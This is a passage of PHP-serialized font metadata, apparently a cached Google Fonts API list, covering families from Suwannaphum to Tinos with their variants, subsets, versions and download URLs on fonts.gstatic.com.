uwannaphum\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"700\";i:4;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v29\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"100\";s:82:\"http://fonts.gstatic.com/s/suwannaphum/v29/jAnAgHV7GtDvc8jbe8hXXL3B9cSWXx2VZmk.ttf\";s:3:\"300\";s:83:\"http://fonts.gstatic.com/s/suwannaphum/v29/jAnfgHV7GtDvc8jbe8hXXL0J1-S8cRGcf3Ai.ttf\";s:7:\"regular\";s:79:\"http://fonts.gstatic.com/s/suwannaphum/v29/jAnCgHV7GtDvc8jbe8hXXIWl_8C0Wg2V.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/suwannaphum/v29/jAnfgHV7GtDvc8jbe8hXXL0Z0OS8cRGcf3Ai.ttf\";s:3:\"900\";s:83:\"http://fonts.gstatic.com/s/suwannaphum/v29/jAnfgHV7GtDvc8jbe8hXXL0h0uS8cRGcf3Ai.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1325;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Swanky and Moo Moo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/swankyandmoomoo/v22/flUlRrKz24IuWVI_WJYTYcqbEsMUZ3kUtbPkR64SYQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1326;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Syncopate\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/syncopate/v19/pe0sMIuPIYBCpEV5eFdyAv2-C99ycg.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/syncopate/v19/pe0pMIuPIYBCpEV5eFdKvtKaA_Rue1UwVg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1327;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Syne\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:5:\"greek\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/syne/v15/8vIS7w4qzmVxsWxjBZRjr0FKM_04uT6kR47NCV5Z.ttf\";s:3:\"500\";s:80:\"http://fonts.gstatic.com/s/syne/v15/8vIS7w4qzmVxsWxjBZRjr0FKM_0KuT6kR47NCV5Z.ttf\";s:3:\"600\";s:80:\"http://fonts.gstatic.com/s/syne/v15/8vIS7w4qzmVxsWxjBZRjr0FKM_3mvj6kR47NCV5Z.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/syne/v15/8vIS7w4qzmVxsWxjBZRjr0FKM_3fvj6kR47NCV5Z.ttf\";s:3:\"800\";s:80:\"http://fonts.gstatic.com/s/syne/v15/8vIS7w4qzmVxsWxjBZRjr0FKM_24vj6kR47NCV5Z.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1328;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Syne Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/synemono/v15/K2FzfZNHj_FHBmRbFvHzIqCkDyvqZA.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1329;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Syne Tactile\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/synetactile/v15/11hGGpna2UTQKjMCVzjAPMKh3ysdjvKU8Q.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1330;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Tai Heritage Pro\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:8:\"tai-viet\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-05-31\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/taiheritagepro/v1/sZlfdQid-zgaNiNIYcUzJMU3IYyNoHxSENxuLuE.ttf\";s:3:\"700\";s:92:\"http://fonts.gstatic.com/s/taiheritagepro/v1/sZlYdQid-zgaNiNIYcUzJMU3IYyNmMB9NNRFMuhjCXY.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1331;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Tajawal\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:73:\"http://fonts.gstatic.com/s/tajawal/v9/Iurf6YBj_oCad4k1l_6gLrZjiLlJ-G0.ttf\";s:3:\"300\";s:73:\"http://fonts.gstatic.com/s/tajawal/v9/Iurf6YBj_oCad4k1l5qjLrZjiLlJ-G0.ttf\";s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/tajawal/v9/Iura6YBj_oCad4k1rzaLCr5IlLA.ttf\";s:3:\"500\";s:73:\"http://fonts.gstatic.com/s/tajawal/v9/Iurf6YBj_oCad4k1l8KiLrZjiLlJ-G0.ttf\";s:3:\"700\";s:73:\"http://fonts.gstatic.com/s/tajawal/v9/Iurf6YBj_oCad4k1l4qkLrZjiLlJ-G0.ttf\";s:3:\"800\";s:73:\"http://fonts.gstatic.com/s/tajawal/v9/Iurf6YBj_oCad4k1l5anLrZjiLlJ-G0.ttf\";s:3:\"900\";s:73:\"http://fonts.gstatic.com/s/tajawal/v9/Iurf6YBj_oCad4k1l7KmLrZjiLlJ-G0.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1332;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Tangerine\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/tangerine/v17/IurY6Y5j_oScZZow4VOBDpxNhLBQ4Q.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/tangerine/v17/Iurd6Y5j_oScZZow4VO5srNpjJtM6G0t9w.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1333;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Tapestry\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/tapestry/v2/SlGTmQecrosEYXhaGBIkqnB6aSQU.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1334;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Taprom\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v27\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/taprom/v27/UcCn3F82JHycULbFQyk3-0kvHg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1335;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Tauri\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/tauri/v16/TwMA-IISS0AM3IpVWHU_TBqO.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1336;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Taviraj\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:73:\"http://fonts.gstatic.com/s/taviraj/v11/ahcbv8Cj3ylylTXzRIorV8N1jU2gog.ttf\";s:9:\"100italic\";s:75:\"http://fonts.gstatic.com/s/taviraj/v11/ahcdv8Cj3ylylTXzTOwTM8lxr0iwolLl.ttf\";s:3:\"200\";s:74:\"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzRCYKd-lbgUS5u0s.ttf\";s:9:\"200italic\";s:77:\"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwTn-hRhWa8q0v8ag.ttf\";s:3:\"300\";s:74:\"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzREIJd-lbgUS5u0s.ttf\";s:9:\"300italic\";s:77:\"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwT--tRhWa8q0v8ag.ttf\";s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/taviraj/v11/ahcZv8Cj3ylylTXzfO4hU-FwnU0.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/taviraj/v11/ahcbv8Cj3ylylTXzTOwrV8N1jU2gog.ttf\";s:3:\"500\";s:74:\"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzRBoId-lbgUS5u0s.ttf\";s:9:\"500italic\";s:77:\"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwTo-pRhWa8q0v8ag.ttf\";s:3:\"600\";s:74:\"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzRDYPd-lbgUS5u0s.ttf\";s:9:\"600italic\";s:77:\"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwTj-1RhWa8q0v8ag.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzRFIOd-lbgUS5u0s.ttf\";s:9:\"700italic\";s:77:\"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwT6-xRhWa8q0v8ag.ttf\";s:3:\"800\";s:74:\"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzRE4Nd-lbgUS5u0s.ttf\";s:9:\"800italic\";s:77:\"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwT9-9RhWa8q0v8ag.ttf\";s:3:\"900\";s:74:\"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzRGoMd-lbgUS5u0s.ttf\";s:9:\"900italic\";s:77:\"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwT0-5RhWa8q0v8ag.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1337;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Teko\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:67:\"http://fonts.gstatic.com/s/teko/v15/LYjCdG7kmE0gdQhfgCNqqVIuTN4.ttf\";s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/teko/v15/LYjNdG7kmE0gTaR3pCtBtVs.ttf\";s:3:\"500\";s:67:\"http://fonts.gstatic.com/s/teko/v15/LYjCdG7kmE0gdVBegCNqqVIuTN4.ttf\";s:3:\"600\";s:67:\"http://fonts.gstatic.com/s/teko/v15/LYjCdG7kmE0gdXxZgCNqqVIuTN4.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/teko/v15/LYjCdG7kmE0gdRhYgCNqqVIuTN4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1338;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Telex\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/telex/v14/ieVw2Y1fKWmIO9fTB1piKFIf.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1339;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Tenali Ramakrishna\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:95:\"http://fonts.gstatic.com/s/tenaliramakrishna/v12/raxgHj6Yt9gAN3LLKs0BZVMo8jmwn1-8KJXqUFFvtA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1340;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Tenor Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/tenorsans/v17/bx6ANxqUneKx06UkIXISr3JyC22IyqI.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1341;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Text Me One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/textmeone/v20/i7dOIFdlayuLUvgoFvHQFWZcalayGhyV.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1342;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Texturina\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:109:\"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2eYG_Ug25riW1OD.ttf\";s:3:\"200\";s:109:\"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2cYGvUg25riW1OD.ttf\";s:3:\"300\";s:109:\"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2fGGvUg25riW1OD.ttf\";s:7:\"regular\";s:109:\"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2eYGvUg25riW1OD.ttf\";s:3:\"500\";s:109:\"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2eqGvUg25riW1OD.ttf\";s:3:\"600\";s:109:\"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2dGHfUg25riW1OD.ttf\";s:3:\"700\";s:109:\"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2d_HfUg25riW1OD.ttf\";s:3:\"800\";s:109:\"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2cYHfUg25riW1OD.ttf\";s:3:\"900\";s:109:\"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2cxHfUg25riW1OD.ttf\";s:9:\"100italic\";s:112:\"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWR1i0Z7AXkODN94.ttf\";s:9:\"200italic\";s:112:\"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWZ1j0Z7AXkODN94.ttf\";s:9:\"300italic\";s:112:\"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWUNj0Z7AXkODN94.ttf\";s:6:\"italic\";s:112:\"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWR1j0Z7AXkODN94.ttf\";s:9:\"500italic\";s:112:\"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWS9j0Z7AXkODN94.ttf\";s:9:\"600italic\";s:112:\"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWcNk0Z7AXkODN94.ttf\";s:9:\"700italic\";s:112:\"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWfpk0Z7AXkODN94.ttf\";s:9:\"800italic\";s:112:\"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWZ1k0Z7AXkODN94.ttf\";s:9:\"900italic\";s:112:\"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWbRk0Z7AXkODN94.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1343;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Thasadith\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/thasadith/v9/mtG44_1TIqPYrd_f5R1YsEkU0CWuFw.ttf\";s:6:\"italic\";s:76:\"http://fonts.gstatic.com/s/thasadith/v9/mtG-4_1TIqPYrd_f5R1oskMQ8iC-F1ZE.ttf\";s:3:\"700\";s:78:\"http://fonts.gstatic.com/s/thasadith/v9/mtG94_1TIqPYrd_f5R1gDGYw2A6yHk9d8w.ttf\";s:9:\"700italic\";s:80:\"http://fonts.gstatic.com/s/thasadith/v9/mtGj4_1TIqPYrd_f5R1osnus3QS2PEpN8zxA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1344;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"The Girl Next Door\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/thegirlnextdoor/v18/pe0zMJCIMIsBjFxqYBIcZ6_OI5oFHCYIV7t7w6bE2A.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1345;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"The Nautigal\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/thenautigal/v3/VdGZAZ8ZH51Lvng9fQV2bfKr5wVk09Se5Q.ttf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/thenautigal/v3/VdGGAZ8ZH51Lvng9fQV2bfKTWypA2_-C7LoS7g.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1346;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Tienne\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"700\";i:2;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/tienne/v20/AYCKpX7pe9YCRP0LkEPHSFNyxw.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/tienne/v20/AYCJpX7pe9YCRP0zLGzjQHhuzvef5Q.ttf\";s:3:\"900\";s:72:\"http://fonts.gstatic.com/s/tienne/v20/AYCJpX7pe9YCRP0zFG7jQHhuzvef5Q.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1347;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Tillana\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/tillana/v11/VuJxdNvf35P4qJ1OeKbXOIFneRo.ttf\";s:3:\"500\";s:74:\"http://fonts.gstatic.com/s/tillana/v11/VuJ0dNvf35P4qJ1OQFL-HIlMZRNcp0o.ttf\";s:3:\"600\";s:74:\"http://fonts.gstatic.com/s/tillana/v11/VuJ0dNvf35P4qJ1OQH75HIlMZRNcp0o.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/tillana/v11/VuJ0dNvf35P4qJ1OQBr4HIlMZRNcp0o.ttf\";s:3:\"800\";s:74:\"http://fonts.gstatic.com/s/tillana/v11/VuJ0dNvf35P4qJ1OQAb7HIlMZRNcp0o.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1348;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Timmana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/timmana/v12/6xKvdShfL9yK-rvpCmvbKHwJUOM.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1349;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Tinos\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/tinos/v24/buE4poGnedXvwgX8dGVh8TI-.ttf\";s:6:\"italic\";s:68:\"http://fonts.gstatic.com/s/tinos/v24/buE2poGnedXvwjX-fmFD9CI-4NU.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/tinos/v24/buE1poGnedXvwj1AW0Fp2i43-cxL.ttf\";s:9:\"700italic\";s:72:\"http://fonts.gstatic.com/s/tinos/v24/buEzpoGnedXvwjX-Rt1s0CoV_NxLeiw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1350;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"T